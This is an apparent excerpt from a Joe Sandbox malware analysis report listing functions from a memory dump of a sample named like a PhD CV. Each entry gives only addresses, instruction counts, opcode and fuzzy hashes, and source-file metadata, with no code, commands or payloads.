                                                                                                  • Instruction ID: 83ca999df33b0eee43ee36fb426a5666872c5f2279ed2b85335691e4fffb7bef
                                                                                                  • Opcode Fuzzy Hash: 0c369ca0bf7687087043bd8cbbfe59670b20e9ecd43693e14616f9d0d984f7a4
                                                                                                  • Instruction Fuzzy Hash: DE31E631B81E81DBE326575ECD49BE577D8BF40BA4F1904B4AE409B6D2DB2CDC40EA11
                                                                                                  Function 00FE43BA Relevance: .1, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b2c8694a1754661a195967c680a62759e47cf1fa34057b1e7f80104ffd22cdde
                                                                                                  • Instruction ID: 243f14ea4cfb58de1a9be0e9545f040c19d136508faf204a3cfd6d6dcb5d2e33
                                                                                                  • Opcode Fuzzy Hash: b2c8694a1754661a195967c680a62759e47cf1fa34057b1e7f80104ffd22cdde
                                                                                                  • Instruction Fuzzy Hash: 08317572E4016CABCB21DF55DC44BDE77B9AF98350F1000E5B908A7291DA34EE419F90
                                                                                                  Function 00F6EA40 Relevance: .1, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f69a25174e5bbe14c7e534cf9bbddea814d224f35ac2e69ae6e6d55a001db8b6
                                                                                                  • Instruction ID: 516fd8c9b7599cfb9fdbdcfb2ba5e1b4757af307a5ff1f10344a1df8560eb43b
                                                                                                  • Opcode Fuzzy Hash: f69a25174e5bbe14c7e534cf9bbddea814d224f35ac2e69ae6e6d55a001db8b6
                                                                                                  • Instruction Fuzzy Hash: 2731A177E01215AFCB21DEE9CC40BAEB7B8FB487A0F118525F955D7250D6789E00AB90
                                                                                                  Function 00F406CF Relevance: .1, Instructions: 95COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e666c9a15d3ae0eee2a3b66ede2d125a495d9870a7355ae33a2dfdb3e9cd2dc
                                                                                                  • Instruction ID: cc568301fd5f9d5ba9d62b9578143ebceeb46822ac832472007cfcf740310bb3
                                                                                                  • Opcode Fuzzy Hash: 9e666c9a15d3ae0eee2a3b66ede2d125a495d9870a7355ae33a2dfdb3e9cd2dc
                                                                                                  • Instruction Fuzzy Hash: 6531C836A04712ABCB21DE148C80E6BBFA5AFC4760F114529FE5597351EE34EC05BFA2
                                                                                                  Function 00F48470 Relevance: .1, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 97cbbbb010d1f9843c8790c21a0f953e828ecf47a6b0ad4e2d8a0b8520dc7f87
                                                                                                  • Instruction ID: 0b350a630e26c4848109505325510f0520070844029a5fe0b6e75c9cfdc92f7d
                                                                                                  • Opcode Fuzzy Hash: 97cbbbb010d1f9843c8790c21a0f953e828ecf47a6b0ad4e2d8a0b8520dc7f87
                                                                                                  • Instruction Fuzzy Hash: FB318BB2A053428FD720CF19C840B2AB7E5FB88710F16496DEC899B2A0D774EC44DB91
                                                                                                  Function 00F7A5E7 Relevance: .1, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                                                                  • Instruction ID: c1ea3d7038165299338473212d0a94a08cbaa4f3c1e0047fb9ea46cc5b984786
                                                                                                  • Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                                                                  • Instruction Fuzzy Hash: A4315E72B00B00AFD764CF69CD45B5BB7F8BB48B50F19492DA59AC7640E630F800AB51
                                                                                                  Function 00FEE750 Relevance: .1, Instructions: 91COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 37f5dcbc282229e48a2ab2c28d5d3cb287588031947faf2cbcf5249eee923f10
                                                                                                  • Instruction ID: db63b5191d54ee26a4dbce94915f56769eeb7a48bd914a5007cdae0379d93096
                                                                                                  • Opcode Fuzzy Hash: 37f5dcbc282229e48a2ab2c28d5d3cb287588031947faf2cbcf5249eee923f10
                                                                                                  • Instruction Fuzzy Hash: 0431CC719043419FCB20DF1AD48495ABBE5FF8A725F0486AEF4889B201D731DE49DB92
                                                                                                  Function 00F642AF Relevance: .1, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1d6263c6279f15379901ec2ee9dadf95c98eb18438d2a335d86da52dc1ad1dae
                                                                                                  • Instruction ID: b4b8cfad0d8164798062508c627a42971b04458c434b9d31d14c9de6088a3156
                                                                                                  • Opcode Fuzzy Hash: 1d6263c6279f15379901ec2ee9dadf95c98eb18438d2a335d86da52dc1ad1dae
                                                                                                  • Instruction Fuzzy Hash: FE31D172B00605EFC720FFA8C982B6EB7FAEB44304F104529E546D7296D735EA45EB90
                                                                                                  Function 00F3CB1E Relevance: .1, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 75f7356f376b215d1c8e41e0ee5735b406fecc07d4fc25f329d1287a1e184bf5
                                                                                                  • Instruction ID: 056c4ee337b961abf5a2c7a9a7448fad3cbd90e9e396be3424efdd7443023e61
                                                                                                  • Opcode Fuzzy Hash: 75f7356f376b215d1c8e41e0ee5735b406fecc07d4fc25f329d1287a1e184bf5
                                                                                                  • Instruction Fuzzy Hash: AA21F236E0025AAADB109BB58812BAFFBB9EF45760F058435AD15F7340E234DD409BE1
                                                                                                  Function 00F3C0F6 Relevance: .1, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4f6b222608f14e490d2e4180d87b55b4300e0a1d4c9ba3abc5bc46f46933f640
                                                                                                  • Instruction ID: c3a6fef21c653e6c8155ed54d08007d7611428e89eadbe007199ba684ea02d40
                                                                                                  • Opcode Fuzzy Hash: 4f6b222608f14e490d2e4180d87b55b4300e0a1d4c9ba3abc5bc46f46933f640
                                                                                                  • Instruction Fuzzy Hash: 263129B29002009BDB21EF18CC41BA97774EF51328F54C1A9E9859B286DE39ED85EB90
                                                                                                  Function 00F3E3C0 Relevance: .1, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3d317a7428ab8725a05a41b935027f6b1a6b56dd61edb559ee7b1040e6a91b2c
                                                                                                  • Instruction ID: be7c8d180ceabddc9bf45c6ba856d2b466363122f33a1b9874d24bd3a2cf9f1f
                                                                                                  • Opcode Fuzzy Hash: 3d317a7428ab8725a05a41b935027f6b1a6b56dd61edb559ee7b1040e6a91b2c
                                                                                                  • Instruction Fuzzy Hash: 7C31EA36A0052CABDB31DB14CC42FEE77B9AF19760F0100A1E655A72D1D674DE85EF90
                                                                                                  Function 00F46D91 Relevance: .1, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a306e2b537a22406b1b9873c0bfb24e31a0a96ec40b562207e635ec04081c6b8
                                                                                                  • Instruction ID: f7c020bec02f50cfc4fb086fd23c55ef01c5550f386b63380eeb96d8b3111f46
                                                                                                  • Opcode Fuzzy Hash: a306e2b537a22406b1b9873c0bfb24e31a0a96ec40b562207e635ec04081c6b8
                                                                                                  • Instruction Fuzzy Hash: 1031E371A002099BDB24DFA8C840BAEF7F4BF46324F15035AE9159B1D2CB74E985D791
                                                                                                  Function 00F743D0 Relevance: .1, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0c2febcfc11edb4a42d5f727fce8624ec520fe60155f356bdc8aed33ce0df541
                                                                                                  • Instruction ID: 0ece83e125829dac0a31a159532f32406e7d5b5a8bd38a095433efe62b63f74b
                                                                                                  • Opcode Fuzzy Hash: 0c2febcfc11edb4a42d5f727fce8624ec520fe60155f356bdc8aed33ce0df541
                                                                                                  • Instruction Fuzzy Hash: CB218D72A047459BCB21DF54C891B6BB7E9FF88720F05851AFD48AB241D734E901BBA2
                                                                                                  Function 00F744A8 Relevance: .1, Instructions: 87COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
                                                                                                  • Instruction ID: f2390286e9c73f4eb1fc9e56e381fcaafb2a979f57555276513774f45a9bd11f
                                                                                                  • Opcode Fuzzy Hash: 2f788e452fe73d534c92f5e9bceb907d933a23c1ad1363216731123cd800826a
                                                                                                  • Instruction Fuzzy Hash: D9216076A00604ABCB11CFA8C980A9ABBB5FF48320F14C076FD099B241D774EE059B95
                                                                                                  Function 00FBE289 Relevance: .1, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d4559d1ae03cd5e4861276894d2356d03eedcce59e9b82dc9ea87019974ff07e
                                                                                                  • Instruction ID: b57e3e533f359535f6d0d8cd82bdc3cc274d96aae964c10a9a47ecb144193945
                                                                                                  • Opcode Fuzzy Hash: d4559d1ae03cd5e4861276894d2356d03eedcce59e9b82dc9ea87019974ff07e
                                                                                                  • Instruction Fuzzy Hash: 69314B75A04206EFCB14CF19C8849EEBBF5FF84704B198469E84A9B351EB31EA45DF90
                                                                                                  Function 00F3E328 Relevance: .1, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0c10296873cf600f6b0a0c706f82a02acdaa8580c5042cc564ea67225c26c471
                                                                                                  • Instruction ID: 04d366fec320f3223ca97c203956f018001bbb600666ff346cc5953cae6610a1
                                                                                                  • Opcode Fuzzy Hash: 0c10296873cf600f6b0a0c706f82a02acdaa8580c5042cc564ea67225c26c471
                                                                                                  • Instruction Fuzzy Hash: 1A31AD31600604EFDB25CF68C884F6ABBF8EF44364F2444A9E511DB291E774EE01EB50
                                                                                                  Function 00F48C79 Relevance: .1, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6500f08a74af63fbfd20657ae4f9c8e6d1ec2716c2b9bdce45284f75af2ea64d
                                                                                                  • Instruction ID: 27c378cc5554322a1b519cc6ef720a7dc6f2e862ee1ebdc95ffc31835c136210
                                                                                                  • Opcode Fuzzy Hash: 6500f08a74af63fbfd20657ae4f9c8e6d1ec2716c2b9bdce45284f75af2ea64d
                                                                                                  • Instruction Fuzzy Hash: BF217F72B01A509BF729876CCD49B2577D8AF427B4F1D00A4EE01977D2EB68DD41F160
                                                                                                  Function 00FC0371 Relevance: .1, Instructions: 79COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f0626bd09048772e3291193eb24415d67d14f29afc8012f17ad0b342fc058e87
                                                                                                  • Instruction ID: 6378f04f1d047ba53babd5ee6f5e86e00e3d5a8b6d10a4f0f63dda67e7367c7e
                                                                                                  • Opcode Fuzzy Hash: f0626bd09048772e3291193eb24415d67d14f29afc8012f17ad0b342fc058e87
                                                                                                  • Instruction Fuzzy Hash: 4B21A071900629DBCF24DF58C882ABEB7F4FF48740B500069F941A7241DB78AD42DBA0
                                                                                                  Function 00FE6D79 Relevance: .1, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e1b37722599df87b3b2e6f4ced2bb7da2a8888bcb0551cc658ce0dd57530e188
                                                                                                  • Instruction ID: d0eeb4dee2a8b6c195f5d55d3ee192d887ab6e48f3a2be068669551c6dcef927
                                                                                                  • Opcode Fuzzy Hash: e1b37722599df87b3b2e6f4ced2bb7da2a8888bcb0551cc658ce0dd57530e188
                                                                                                  • Instruction Fuzzy Hash: AC21C431A047858BC720EA36CC40B6BB7D9EFE5364F00492DE4EAC3181CB74AD499795
                                                                                                  Function 00F62755 Relevance: .1, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dcff6a8f556b34f925ee47b7458d58197eb9e2e37ee14c0c9e17211c3dc80dd6
                                                                                                  • Instruction ID: b659d1fb8b23ab02c08612ab49d309a03f48be720a9897f5fa23c3429cc817ad
                                                                                                  • Opcode Fuzzy Hash: dcff6a8f556b34f925ee47b7458d58197eb9e2e37ee14c0c9e17211c3dc80dd6
                                                                                                  • Instruction Fuzzy Hash: 34210872A45B81DBE322572C8D48F2437D5AB45BB5F2903A4FD219B6D3DB6C8C05E211
                                                                                                  Function 00F46B70 Relevance: .1, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 920d5b909806b3facf05956b1c18f98678fb4139a254831fff11f117e8eeedb9
                                                                                                  • Instruction ID: 136db48e3bd1fc77b94282ca5e9d431bd93b3473915f79002675a137778d2326
                                                                                                  • Opcode Fuzzy Hash: 920d5b909806b3facf05956b1c18f98678fb4139a254831fff11f117e8eeedb9
                                                                                                  • Instruction Fuzzy Hash: 573187B5A01600CFC724CF59C580B16BBE8FB89724F2584ADE949CB752CB31ED42DB91
                                                                                                  Function 00FBCD40 Relevance: .1, Instructions: 73COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7477e4733c3d8ac1b6be6b0fe7f659da3ee30cf32468bb8c8f799742df5ae00d
                                                                                                  • Instruction ID: 459c79ddfcb041426489299c6217a388a7d36f884c21f701405110c385055027
                                                                                                  • Opcode Fuzzy Hash: 7477e4733c3d8ac1b6be6b0fe7f659da3ee30cf32468bb8c8f799742df5ae00d
                                                                                                  • Instruction Fuzzy Hash: 9D21C276644704DBD3219F19CC42B9B7BA4FF88B20F11052AF95597391D734ED00ABE9
                                                                                                  Function 00F7A22B Relevance: .1, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 939ed9f5d7051e1db4ee315daae66a286edf300643667f518752bdfb0377d1c0
                                                                                                  • Instruction ID: da366f4cba188c3f3ca74a386854f7beb68695bd2bbebc78dc8d042c7f2c3603
                                                                                                  • Opcode Fuzzy Hash: 939ed9f5d7051e1db4ee315daae66a286edf300643667f518752bdfb0377d1c0
                                                                                                  • Instruction Fuzzy Hash: DF21AC75600A00AFC725DF29CC01B46B3F4FF88B14F248469E559CB752E336E842EB95
                                                                                                  Function 00FC05C6 Relevance: .1, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f634f08ef19040133b30cb0ee1036ab39770227e88920886f13b77a9d7899c28
                                                                                                  • Instruction ID: 1b2bb7283b668cea39e0c923f0474cbc5ec72284f38715c4ec3b20dc844afe1c
                                                                                                  • Opcode Fuzzy Hash: f634f08ef19040133b30cb0ee1036ab39770227e88920886f13b77a9d7899c28
                                                                                                  • Instruction Fuzzy Hash: 1A21E9B1E00219EBCB20DFAAD981AAEFBF8FF98710F10412FE405A7251DB759941DB54
                                                                                                  Function 00FC0AFF Relevance: .1, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 87f50c2248fc33bbcab6f486e21a34847d550d4dbfb35f187fe5d600c49e8dc4
                                                                                                  • Instruction ID: e5e69df6fb45f9bd15d3ff3ed5b34314cf4458e8c43e121a55cfed853239ad17
                                                                                                  • Opcode Fuzzy Hash: 87f50c2248fc33bbcab6f486e21a34847d550d4dbfb35f187fe5d600c49e8dc4
                                                                                                  • Instruction Fuzzy Hash: A521BB72900A04ABC725DB68CD95E9AB7B8EF88740F10056DF60AC7650DA38EE01DBA4
                                                                                                  Function 00F70044 Relevance: .1, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 890f1da43df6bf821c9fa0e63626150f351daea58c3e7afc6d4a7f240fe17a3e
                                                                                                  • Instruction ID: ca1b3aaebb276836432157e2b28d1ba122011fb5755d21308ad3ede0ba1b0a8e
                                                                                                  • Opcode Fuzzy Hash: 890f1da43df6bf821c9fa0e63626150f351daea58c3e7afc6d4a7f240fe17a3e
                                                                                                  • Instruction Fuzzy Hash: C111B273600604EFD722AF54DC45F9EBBB9EF84764F10802AFA089B180DAB5ED45E761
                                                                                                  Function 00F48690 Relevance: .1, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1a3a30728e023ff8bdc757d9c45fcaec302a2e4d56d711aadfec0100ffd34be1
                                                                                                  • Instruction ID: 1eac16a2132e6f2c673b56e20baf5c354ff5add47c791f904423b6e1ba8e9ce0
                                                                                                  • Opcode Fuzzy Hash: 1a3a30728e023ff8bdc757d9c45fcaec302a2e4d56d711aadfec0100ffd34be1
                                                                                                  • Instruction Fuzzy Hash: 1F119876B016119B8B11CF49C5D0A6EBFE9AF4B7A07254069ED08DF305DBB2ED02A790
                                                                                                  Function 00FE4AC2 Relevance: .1, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                                  • Instruction ID: 701e435307f32325499b60d83834c9bfef3040f1ccad9869775c6412a9b0850d
                                                                                                  • Opcode Fuzzy Hash: 7c72c45912d47683c52433c96848dfb8decf3587e712a2c85a6b68d0e49ae640
                                                                                                  • Instruction Fuzzy Hash: 85216F71E00219EFCB05CF89C8809AEFBB5FF98314F5140A9E805A7351DA31AE41DBA0
                                                                                                  Function 00F7AA0E Relevance: .1, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_f10000_Maryam Farokhi-PhD- CV-1403.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bc3492ee58ae507e05650e1380ccd0cbe77e5c14439bc1406ce94b79f981a113
                                                                                                  • Instruction ID: b74f27c62de45c8621aa35142957920fb66eda81bc3d8e82d95606c10000b3ed
                                                                                                  • Opcode Fuzzy Hash: bc3492ee58ae507e05650e1380ccd0cbe77e5c14439bc1406ce94b79f981a113
                                                                                                  • Instruction Fuzzy Hash: 04218072A40641DFE7318F49C640B6AB7E5EBD4B10F16847EE44987620C738DD00EF82
                                                                                                  Function 00F48009 Relevance: .1, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.30064561251.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
